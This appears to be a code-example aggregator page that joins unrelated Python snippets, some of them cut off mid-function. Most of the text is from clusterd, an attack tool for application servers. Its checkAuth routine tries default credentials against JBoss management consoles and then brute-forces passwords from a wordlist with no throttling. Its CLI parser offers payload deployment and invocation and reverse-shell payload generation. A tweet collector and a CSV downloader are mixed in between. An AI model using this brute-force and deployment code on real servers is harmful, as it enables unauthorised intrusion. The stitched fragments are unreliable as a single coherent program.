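        state.proxy = options.proxy

    if options.proxy_auth:
        state.proxy_auth = options.proxy_auth

    if options.debug:
        state.isdebug = True

    if options.usr_auth:
        state.usr_auth = options.usr_auth

    if options.wordlist:
        state.bf_wordlist = options.wordlist

    if options.random_agent:
        # select a random user-agent from the list; the file is closed as
        # soon as its lines have been read (the original left the handle
        # open for the garbage collector)
        with open('./src/lib/user-agents.txt') as agents:
            state.random_agent = choice(list(agents)).rstrip()
        utility.Msg("Random user agent '%s' selected" % (state.random_agent),
                    LOG.DEBUG)

    if options.listener:
        state.listener = options.listener

    state.ssl = options.ssl
    state.bf_user = options.bf_user
    state.flog = ("%s_log.log" % utility.timestamp().replace(' ', '_')
                  if options.flog else None)

    try:
        state.timeout = float(options.timeout)
    except (TypeError, ValueError):
        # Only conversion failures are expected here; a bare except would
        # also swallow KeyboardInterrupt and SystemExit.  state.timeout
        # keeps its previous value.
        utility.Msg(
            "Timeout value must be an integer.  Defaulting to %d." %
            state.timeout, LOG.ERROR)

    return options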
Пример #30
def checkAuth(ip, port, title, version):
    """ Try to authenticate to a JBoss management interface on ip:port.

    Two paths, chosen by `version` and `title`:

    * Versions 5.1/6.0/6.1 with title JINTERFACES.WM: each pair in
      default_credentials is posted to /admin-console/login.seam.  On an
      HTTP 200 response a (cookie dict, None) tuple is returned.
      state.usr_auth and the wordlist are not used on this path.
    * Otherwise the URL is chosen from `title` (JMX, MM or WC; anything
      else is reported as unsupported and None is returned).  Then:
      state.usr_auth if set (result of `_auth` returned as-is, truthy or
      not), each pair in default_credentials, and finally each line of
      state.bf_wordlist as a password for state.bf_user, once per process
      (guarded by state.hasbf).

    Returns the first truthy result, or None when nothing succeeds or the
    wordlist loop is interrupted with Ctrl-C.

    NOTE(review): every URL built here is http://; state.ssl is not
    consulted in this body (it may be applied inside the request helpers
    -- not visible here), so credentials may travel in clear text.
    """

    # `is` compares identity, so `title` must be the very JINTERFACES
    # member, not an equal value.
    if version in ["5.1", "6.0", "6.1"] and title is JINTERFACES.WM:
        for (usr, pswd) in default_credentials:
            url = "http://%s:%s/admin-console/login.seam" % (ip, port)
            # Field order is fixed with OrderedDict; the view state is
            # fetched fresh for every attempt.
            data = OrderedDict([
                    ("login_form", "login_form"),
                    ("login_form:name", usr),
                    ("login_form:password", pswd),
                    ("login_form:submit", "Login"),
                    ("javax.faces.ViewState", utility.fetch_viewState(url)),
                   ])

            response = utility.requests_post(url, data=data)
            # NOTE(review): a 200 status is taken as a successful login;
            # whether a rejected login can also answer 200 is not visible
            # from here -- confirm.
            if response.status_code == 200:
                utility.Msg("Successfully authenticated with %s:%s" % (usr, pswd), LOG.DEBUG)
                if version in ["5.1"]:
                    # For 5.1 the cookies are read from the first response
                    # in the redirect history, not the final one.
                    return (dict_from_cookiejar(response.history[0].cookies), None)
                return (dict_from_cookiejar(response.cookies), None)

    else:
        if title is JINTERFACES.JMX:
            url = "http://%s:%s/jmx-console/" % (ip, port)
        elif title is JINTERFACES.MM:
            url = "http://%s:%s/management" % (ip, port)
        elif title is JINTERFACES.WC:
            url = "http://%s:%s/web-console" % (ip, port)
        else:
            utility.Msg("Unsupported auth interface: %s" % title, LOG.DEBUG)
            return

        # check with given auth
        if state.usr_auth:
            # NOTE(review): split(':') without a maxsplit raises
            # ValueError when the value holds more than one ':' or none.
            (usr, pswd) = state.usr_auth.split(':')
            # Returned directly: supplied credentials short-circuit every
            # fallback below.
            return _auth(usr, pswd, url, version)

        # else try default credentials
        for (usr, pswd) in default_credentials:
            cook = _auth(usr, pswd, url, version)
            if cook:
                return cook

        # if we're still here, check if they supplied a wordlist
        if state.bf_wordlist and not state.hasbf:

            state.hasbf = True
            wordlist = []
            # NOTE(review): this open() is not wrapped in try/except, so
            # an unreadable wordlist raises out of this function.
            with open(state.bf_wordlist, 'r') as f:
                # ensure everything is ascii or requests will explode
                # (non-ASCII bytes are dropped, which silently alters
                # entries that contain them)
                wordlist = [x.decode("ascii", "ignore").rstrip() for x in f.readlines()]

            utility.Msg("Brute forcing %s account with %d passwords..." %
                                        (state.bf_user, len(wordlist)), LOG.DEBUG)

            try:
                # Nothing in this loop paces or caps the attempts.
                for (idx, word) in enumerate(wordlist):
                    # Progress line rewritten in place on the terminal.
                    stdout.flush()
                    stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m" \
                                        % (utility.timestamp(), state.bf_user,
                                           idx+1, len(wordlist)))

                    cook = _auth(state.bf_user, word, url, version)
                    if cook:
                        print ''  # newline

                        # lets insert these credentials to the default list so we
                        # don't need to bruteforce it each time
                        if not (state.bf_user, word) in default_credentials:
                            default_credentials.insert(0, (state.bf_user, word))

                        # NOTE(review): the accepted password is emitted
                        # in clear text through utility.Msg; any log file
                        # this feeds is credential material.
                        utility.Msg("Successful login %s:%s" % 
                                        (state.bf_user, word), LOG.SUCCESS)
                        return cook

                print ''

            except KeyboardInterrupt:
                # Ctrl-C stops the loop; the function then returns None.
                pass
Пример #31
from datetime import datetime
import json
from os import rename
import lib

from s3 import create_boto_client, process_local_file_to_S3
from twitter_funcs import collect_tweets, create_tweet_iterator
from mongo import create_mongo_client_to_database_collection, insert_to_mongo
from utility import get_credentials, timestamp, write_to_disk
from requests import HTTPError

if __name__ == "__main__":
    # Refuse to start without a Twitter token.
    # NOTE(review): only the Twitter token is checked; nothing here
    # validates S3 or Mongo credentials before the loop starts.
    credentials = get_credentials()
    twitter_token = credentials['twitter']['token']
    if twitter_token is None:
        print("Did you forget to add your twitter tokens to the credentials.json file?")
        raise HTTPError

    # One handle per backing service, created once and reused per batch.
    tweet_iterator = create_tweet_iterator()
    s3_client = create_boto_client()
    collection_client = create_mongo_client_to_database_collection()

    # Collect, persist locally, upload, then index -- repeated until the
    # process is stopped or one of the calls raises.
    while True:
        timestamp()
        tweets = collect_tweets(tweet_iterator, 100)
        filename = write_to_disk(tweets)
        process_local_file_to_S3(s3_client, filename)
        insert_to_mongo(s3_client, collection_client, filename)
Пример #32
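def parse(arguments):
    """ Parse command line options and mirror a subset of them onto ``state``

    Builds the ArgumentParser (connection, remote host, deploy, one group per
    supported platform, and miscellaneous flags), parses ``arguments`` and
    copies proxy, credential, wordlist, user-agent, listener, ssl, brute-force
    user, log-file and timeout settings onto the module-level ``state``.

    arguments -- list of argument strings passed to ``parser.parse_args``

    Returns the parsed options namespace.  Prints the help text and exits
    with status 1 when ``sys.argv`` holds nothing beyond the program name.

    NOTE(review): --proxy-auth and --usr-auth accept secrets as command line
    values; such values are typically visible in shell history and in the
    process list of the local machine, so treat the invoking host accordingly.
    """
    parser = ArgumentParser(usage='./clusterd.py [options]')

    #
    # Connection related command line arguments
    #
    connection = parser.add_argument_group("Connection",
                    description = 'Options for configuring the connection')
    connection.add_argument("-i", help='Server address', action='store',
                            dest='ip', metavar='[ip address]')
    connection.add_argument("-iL", help='Server list', action='store',
                            dest='input_list', metavar='[file]')
    connection.add_argument('-p', help='Server port', action='store',
                            dest='port', type=int, metavar='[port]')
    connection.add_argument('--proxy', help='Connect through proxy [http|https]',
                            action='store', dest='proxy',
                            metavar="[proxy://server:port]")
    connection.add_argument('--proxy-auth', help='Proxy credentials',
                            action='store', dest='proxy_auth',
                            metavar='[username:password]')
    # The default is whatever state.timeout holds when the parser is built;
    # the value is converted to float further down, not by argparse.
    connection.add_argument('--timeout', help='Connection timeout [%ds]' % state.timeout,
                            action='store', dest='timeout',
                            default=state.timeout, metavar='[seconds]')
    connection.add_argument("--random-agent", help='Use a random User-Agent for'\
                            ' requests', action='store_true', dest='random_agent',
                            default=False)
    connection.add_argument("--ssl", help='Force SSL', action='store_true',
                            dest='ssl', default=False)

    #
    # Remote host command line arguments
    #
    remote = parser.add_argument_group('Remote Host',
                        description = 'Settings specific to the remote host')
    remote.add_argument('-a', help='Hint at remote host service',
                    action='store', dest='remote_service',
                    metavar='[%s]' % ('|'.join(state.supported_platforms)))
    remote.add_argument('-o', help='Hint at remote host OS',
                    action='store', dest='remote_os',
                    metavar='[windows|linux]', default='windows')
    remote.add_argument('-v', help='Specific version to test', action='store',
                    dest='version', metavar='[version]', default=None)
    remote.add_argument('--usr-auth', help='Login credentials for service',
                    action='store', dest='usr_auth',
                    metavar='[username:password]')
    remote.add_argument('--fingerprint', help='Fingerprint the remote system',
                    action='store_true', dest='fp', default=False)
    remote.add_argument("--arch", help='Specify remote OS architecture',
                    action='store', dest='arch', default='x86',
                    metavar='[x86|x64]')

    #
    # deploy options
    #
    deploy = parser.add_argument_group("Deploy",
                      description = 'Deployment flags and settings')
    deploy.add_argument("--deploy", help='Deploy to the discovered service',
                    action='store', dest='deploy', metavar='[file]')
    deploy.add_argument("--undeploy", help='Undeploy file from server',
                    action='store', dest='undeploy', metavar='[context]')
    deploy.add_argument("--deployer", help="Specify a deployer to use",
                    action='store', dest='deployer', default=None,
                    metavar='[deployer]')
    deploy.add_argument("--invoke", help="Invoke payload after deployment",
                    action='store_true', dest='invoke_payload', default=False)
    deploy.add_argument("--rand-payload", help='Use a random name for the deployed file',
                    action='store_true', dest='rand_payload', default=None)
    deploy.add_argument("-b", help="Brute force credentials for user [admin]", action='store',
                    dest='bf_user', metavar='[user]', default='admin')
    deploy.add_argument('--wordlist', help='Wordlist for brute forcing passwords',
                    action='store', dest='wordlist', default=None,
                    metavar='[path]')

    #
    # iterate over our supported platforms and build their
    # auxiliary modules
    #
    for platform in state.supported_platforms:

        group = parser.add_argument_group(platform + " modules")
        group = build_platform_flags(platform, group)


    other = parser.add_argument_group("Other",
                            description='Miscellaneous flags')
    other.add_argument("--deployer-list", help="List all available deployers",
                    action='store_true', dest='deploy_list', default=False)
    other.add_argument("--aux-list", help="List all available exploits",
                    action='store_true', dest='aux_list', default=False)
    other.add_argument("--gen-payload", help='Generate a reverse shell payload',
                     action='store', dest='generate_payload',
                     metavar='[host:port] for reverse connection')
    other.add_argument("--discover",help="Attempt to discover application servers using the specified nmap gnmap output (use -sV when scanning)",
                     action="store",dest='discovery_file',metavar='[discovery_file]')
    other.add_argument("--listen", help='Adapter to listen on when needed',
                    action='store', dest='listener', metavar='[adapter]',
                    default=None)
    other.add_argument("-d", help='Enable debug output', action='store_true',
                    dest='debug', default=False)
    other.add_argument("-l", help='Log output to file [$time$_log.log]',
                    dest='flog', action='store_true', default=False)

    # parse cli options
    options = parser.parse_args(arguments)

    # The emptiness check looks at sys.argv, not at `arguments`.
    if len(sys.argv) <= 1:
        parser.print_help()
        sys.exit(1)

    #
    # Setup state variables from given flags
    #
    if options.proxy:
        state.proxy = options.proxy

    if options.proxy_auth:
        state.proxy_auth = options.proxy_auth

    if options.debug:
        state.isdebug = True

    if options.usr_auth:
        state.usr_auth = options.usr_auth

    if options.wordlist:
        state.bf_wordlist = options.wordlist

    if options.random_agent:
        # select a random user-agent from the list; the context manager
        # closes the file handle, which the previous bare open() never did
        with open('./src/lib/user-agents.txt') as agents:
            state.random_agent = choice(list(agents)).rstrip()
        utility.Msg("Random user agent '%s' selected" % (state.random_agent), LOG.DEBUG)

    if options.listener:
        state.listener = options.listener

    state.ssl = options.ssl
    state.bf_user = options.bf_user
    # The log name is relative, so the file lands in the current working
    # directory.  NOTE(review): what utility.Msg records in it is not visible
    # here -- confirm whether credentials can end up in the log and restrict
    # access to it if so.
    state.flog = ("%s_log.log" % utility.timestamp().replace(' ', '_') if options.flog else None)

    try:
        state.timeout = float(options.timeout)
    except (TypeError, ValueError):
        # Only conversion failures are handled; a bare except here would also
        # have swallowed KeyboardInterrupt and SystemExit.  state.timeout
        # keeps its previous value.
        utility.Msg("Timeout value must be an integer.  Defaulting to %d."
                        % state.timeout, LOG.ERROR)

    return options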
Пример #33
            writer = csv.DictWriter(f, headers)
            if not exist:
                writer.writeheader()
            writer.writerow(
                dict(mid=dn['mid'],
                     aid=dn['aid'],
                     cid=dn['cid'],
                     title=dn['title'],
                     url=dn['url']))
        print('failed topic saved in {}'.format(fn))
    except Exception as e:
        logger.error('error : failed to save topics. {}'.format(e))


if __name__ == '__main__':
    runid = utility.timestamp()
    md, kw, params = parse_command_line()
    if md is None:
        exit(-1)
    if md == 'h':
        if os.path.isfile('help.txt'):
            if 'Darwin' in platform.system():
                os.system('cat help.txt')
            if 'Windows' in platform.system():
                os.system('type help.txt')
        exit(0)

    all_topics, all_files, all_downloads = [], [], []

    startupinfo = subprocess.STARTUPINFO()
    startupinfo.dwFlags = subprocess.STARTF_USESHOWWINDOW